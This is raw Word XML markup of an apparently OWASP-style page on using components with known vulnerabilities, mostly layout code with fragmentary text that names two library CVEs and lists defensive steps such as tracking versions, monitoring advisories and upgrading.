            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0FF31AE9">
          <v:shape id="imagerId589" o:spid="_x0000_s2335" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251778560;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId589" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7C5C0481">
          <v:shape id="imagerId590" o:spid="_x0000_s2334" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251777536;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId590" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7125BAFA">
          <v:shapetype id="_x0000_m2333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F82FB3C">
          <v:shape id="_x0000_s2332" type="#_x0000_m2333" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25180006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6EED14B8">
          <v:shapetype id="_x0000_m2331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840D494">
          <v:shape id="_x0000_s2330" type="#_x0000_m2331" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.55pt;width:543pt;height:3pt;z-index:25168844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A27DD74">
          <v:shapetype id="_x0000_m2329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6675AA5">
          <v:shape id="_x0000_s2328" type="#_x0000_m2329" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.8pt;width:543pt;height:3pt;z-index:25168947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60D4BED">
          <v:shapetype id="_x0000_m2327" coordsize="600,20706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72690B9">
          <v:shape id="_x0000_s2326" type="#_x0000_m2327" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.9pt;width:6pt;height:207.05pt;z-index:25169049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5D8AE9F0">
          <v:shapetype id="_x0000_m2325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53D8922">
          <v:shape id="_x0000_s2324" type="#_x0000_m2325" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.4pt;width:543pt;height:3pt;z-index:25169152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4C2BB3D">
          <v:shapetype id="_x0000_m2323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D95DD7E">
          <v:shape id="_x0000_s2322" type="#_x0000_m2323" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:274.5pt;width:543pt;height:3pt;z-index:25169254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495EE571">
          <v:shapetype id="_x0000_m2321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8950281">
          <v:shape id="_x0000_s2320" type="#_x0000_m2321" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25179904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678E02A0">
          <v:shapetype id="polygon142" o:spid="_x0000_m2319" coordsize="1406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E07A651">
          <v:shape id="WS_polygon142" o:spid="_x0000_s2318" type="#polygon142" style="position:absolute;left:0;text-align:left;margin-left:20.75pt;margin-top:607.2pt;width:140.6pt;height:.55pt;z-index:-25179801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6844460">
          <v:shapetype id="_x0000_m2317" coordsize="1250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B3FCD45">
          <v:shape id="_x0000_s2316" type="#_x0000_m2317" style="position:absolute;left:0;text-align:left;margin-left:20.75pt;margin-top:652.2pt;width:125pt;height:.55pt;z-index:-25179699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9B2CB54">
          <v:shapetype id="polygon164" o:spid="_x0000_m2315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B2F015A">
          <v:shape id="WS_polygon164" o:spid="_x0000_s2314" type="#polygon164" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25179596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45539723">
          <v:shapetype id="_x0000_m2313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2D9F175">
          <v:shape id="_x0000_s2312" type="#_x0000_m2313" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251794944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6E10E3E0">
          <v:shapetype id="_x0000_m2311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903086E">
          <v:shape id="_x0000_s2310" type="#_x0000_m2311" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25179392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46727C6">
          <v:shapetype id="_x0000_m2309" coordsize="1418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46D992B">
          <v:shape id="_x0000_s2308" type="#_x0000_m2309" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:141.8pt;height:.6pt;z-index:-2517928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B99CFFA">
          <v:shapetype id="_x0000_m2307" coordsize="1816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6CC7CFD">
          <v:shape id="_x0000_s2306" type="#_x0000_m2307" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:606.2pt;width:181.65pt;height:.6pt;z-index:-2517918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DE3E794">
          <v:shapetype id="_x0000_m2305" coordsize="126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B37E15F">
          <v:shape id="_x0000_s2304" type="#_x0000_m2305" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:126pt;height:.55pt;z-index:-2517908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9CDD3BA">
          <v:shapetype id="_x0000_m2303" coordsize="237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84054B9">
          <v:shape id="_x0000_s2302" type="#_x0000_m2303" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:638.15pt;width:237.95pt;height:.6pt;z-index:-2517898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6FF01FE">
          <v:shapetype id="polygon228" o:spid="_x0000_m2301" coordsize="186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FFC3D5F">
          <v:shape id="WS_polygon228" o:spid="_x0000_s2300" type="#polygon228" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:654.2pt;width:186.7pt;height:.6pt;z-index:-2517888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ACB4605">
          <v:shapetype id="polygon232" o:spid="_x0000_m2299" coordsize="2300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34A05DB">
          <v:shape id="WS_polygon232" o:spid="_x0000_s2298" type="#polygon232" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:670.2pt;width:230pt;height:.55pt;z-index:-25178777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9CF8CCE">
          <v:shapetype id="_x0000_m2297" coordsize="1413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A59AA8E">
          <v:shape id="_x0000_s2296" type="#_x0000_m2297" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:680.15pt;width:141.35pt;height:.6pt;z-index:-25178675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CF0DCD5">
          <v:shapetype id="polygon237" o:spid="_x0000_m2295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F54A9A6">
          <v:shape id="WS_polygon237" o:spid="_x0000_s2294" type="#polygon237" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25178572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DFD3013">
          <v:shapetype id="_x0000_m2293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52A42E2">
          <v:shape id="_x0000_s2292" type="#_x0000_m2293" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251784704;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2F469" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="731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F7F7F"/>
          <w:w w:val="94"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94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4"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94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4"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94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4"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C873E08" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="600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Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63833C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13AE75D5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EB2879" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267C775C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFBD041" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A70FA32" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3B2CEC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583754FE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC46678" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529BED66" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EF39CC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E89157B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0A0FBD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490A8978" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3448A932" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628FAC84" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDA3D7D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B75AFB7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE2C804" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731FEE55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Known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s?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B072B84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ory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ugh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as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ig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u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you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urrently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D2B83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u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brarie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fortunately,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B2225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vulnerabil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por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mercia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p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urc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ftware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9D24F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way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pecif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act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i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sion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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75061E0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tandard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arch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ay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urther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</w:p>
    <w:p w14:paraId="06BBD495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librar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derstand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ers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umber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ystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7155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Wor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ilit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por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entral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ABA2B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learingho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as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arch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thoug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ke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591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CVE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FA4DE5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NV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com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asi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arch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F347FE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etermin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ir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arch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se</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D8336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atabase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e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keep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brea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j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il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sts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F8157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nouncemen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th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igh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</w:p>
    <w:p w14:paraId="4451C577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vulnerability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n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</w:p>
    <w:p w14:paraId="10113E6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vulnerability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ou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refu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valu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</w:p>
    <w:p w14:paraId="0094870F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ctu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eck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5D0E0B69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par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il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</w:p>
    <w:p w14:paraId="7ED8A77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la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u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sul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pa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bout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E64BD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8B8A17" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373D6F9E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="350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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFE361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ompon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ilit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mo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yp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isk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2D80D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imaginabl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ang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ro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ivia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phistic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lware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257666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design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rge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pecific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ganization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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E015F9A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lmo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way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u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u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vile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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD8864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law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iou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llow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wo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326181B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e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wnload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22m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im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2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07778AFF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="323232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hyperlink r:id="rId592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pache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593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CXF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594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uthentication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59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Bypass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–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ail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ovide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BFB2F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="271"/>
      </w:pP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dent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ke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u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vok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eb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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FE370" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="271"/>
      </w:pP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u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ermission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(Apac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X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ic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ramework,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144FD5A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>no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fus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ac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.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB85256" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="301" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="323232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hyperlink r:id="rId596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Spring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597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Remote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59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Code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599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Execution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–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b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pression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BBC22" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Langua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mplement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pr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ow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</w:p>
    <w:p w14:paraId="0EAD26D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="271"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>execu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bitrar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d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ffective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k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v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rver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6D7D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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Ever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i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brari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</w:p>
    <w:p w14:paraId="38828ED4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ot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mponen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rectly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE2A85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accessi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ibraries,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1D914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us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eep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rd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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11A6EA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0F3D1FE6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FD7992" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352DA6AA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="335F8C51" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7396E0FB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E41EA0D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BCF214" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089FBEC3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7365FBFB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A80AE6B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AFF772" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB48935" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B00AA52" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5392CD20" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D42D73" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E0730B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AA0D70" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD2747B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This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB50A7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95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>On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optio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no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o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s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component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ha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you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didn’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write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1D277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Bu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’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no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er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alistic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253D0C2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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Mos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componen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projects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do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no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creat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vulnerability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patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247C7ECA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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for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old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versions.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Instead,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mos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simply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fix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h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problem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in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he</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5718DCD4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nex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ersion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pgrad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new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ers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ritical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC9BDC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Softw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jec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houl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hav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roc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lac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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5447DF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1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Identif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pon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ers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you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ing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25562715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includ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pendencies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(e.g.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vers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lugin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752607D9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2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Monit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curit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s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ponen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ublic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F080B03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databases,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project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mailing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lists,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n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security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mailing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lists,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B639C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kee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m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ate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E491245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3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Establis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curit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olici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govern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mpone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e,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E9631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su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quir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erta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oftw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velopment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4BE54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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>practices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assing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security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ests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n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cceptabl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licenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33665EFA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="25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4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Whe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ppropriate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onsid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dd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ecurit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wrappers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79567B14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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>around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components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o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disabl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unused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functionality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nd/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC9B71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o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secur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weak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r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vulnerabl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spect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f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omponent.</w:t>
      </w:r>
    </w:p>
